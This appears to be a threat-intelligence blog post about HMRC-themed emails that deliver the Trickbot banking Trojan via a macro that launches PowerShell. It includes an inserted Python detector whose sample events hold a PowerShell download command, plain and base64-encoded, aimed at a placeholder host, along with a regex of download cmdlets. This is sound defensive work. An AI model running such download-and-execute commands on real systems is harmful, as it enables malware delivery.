HMRC-themed emails carry Trickbot infection


Troy Gill

A cybercrime group is currently targeting businesses in the UK with malware-laden emails containing the banking Trojan known as Trickbot.

In recent years, several malware families have heavily targeted the UK in attempts to spread banking Trojans that seek access to business and personal accounts.

The messages, which state that there has been an error in processing a payment, pose as legitimate communication from HMRC.

Here is a look at the attack:


The messages carry a document containing a VBA macro that executes when the document is opened. The payload calls PowerShell to drop a PE file, identified as Trickbot, from a compromised web server in the US.
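A defender-side check for the chain described above (an Office document macro launching PowerShell to fetch a file), added here as an example and not taken from the original post. Field names follow Sysmon process-creation events; the sample events, the `example.invalid` URL and the `OFFICE_PARENTS` and `DOWNLOAD_HINTS` lists are constructed assumptions.

```python
import base64
import re
from ntpath import basename  # parses Windows paths on any OS

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_HINTS = re.compile(
    r"downloadfile|downloadstring|net\.webclient|invoke-webrequest", re.IGNORECASE)
# PowerShell accepts prefixes of -EncodedCommand (-e, -enc, ...); value is base64
ENCODED_ARG = re.compile(r"\s-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

def effective_command(command_line):
    """Append the decoded -EncodedCommand body (base64 of UTF-16LE), if present."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return command_line
    try:
        decoded = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers malformed base64 and malformed UTF-16LE
        return command_line
    return command_line + " " + decoded

def classify(event):
    """Return 'high', 'medium' or None for one process-creation event."""
    parent = basename(event["ParentImage"]).lower()
    child = basename(event["Image"]).lower()
    if parent not in OFFICE_PARENTS or child not in SHELLS:
        return None
    if DOWNLOAD_HINTS.search(effective_command(event["CommandLine"])):
        return "high"    # Office spawned PowerShell that fetches remote content
    return "medium"      # Office spawning PowerShell at all is worth a look

# Constructed sample events (Sysmon Event ID 1 style fields); not from the campaign.
_FETCH = "(New-Object Net.WebClient).DownloadFile('http://example.invalid/a','a')"
_ENC = base64.b64encode(_FETCH.encode("utf-16-le")).decode()
OFFICE = r"C:\Program Files\Microsoft Office\Office16"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": OFFICE + r"\WINWORD.EXE", "Image": PS,
     "CommandLine": "powershell.exe -c " + _FETCH},
    {"ParentImage": OFFICE + r"\EXCEL.EXE", "Image": PS,
     "CommandLine": "powershell.exe -NoP -enc " + _ENC},
    {"ParentImage": OFFICE + r"\WINWORD.EXE", "Image": PS,
     "CommandLine": "powershell.exe -c Get-Date"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -c Invoke-WebRequest http://example.invalid/"},
]

if __name__ == "__main__":
    print([classify(ev) for ev in SAMPLE_EVENTS])
```

The encoded case matters because a download keyword hidden inside `-EncodedCommand` would otherwise only score as "medium".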

Trickbot has received consistent upgrades over its lifecycle. It was seen leveraging the EternalBlue exploit not long after WannaCry had such success spreading via its use. Late last year, it was updated with modules to target cryptocurrency wallets such as Coinbase. More recently, it was updated with a module to encrypt targeted systems, thus adding ransomware to its repertoire. This evolution shows an effort on the part of the distributors to vary their business model toward what works best to maximize their return per infection.

Additionally, the malware establishes a connection to a Russia-based IP address that has been associated with Dridex activity. Dridex, which has evolved over the years from Zeus and Cridex, is also commonly used to target and compromise UK businesses for the purpose of financial fraud. Might there be some connection between the groups operating these malware families? Or perhaps they have some shared infrastructure.

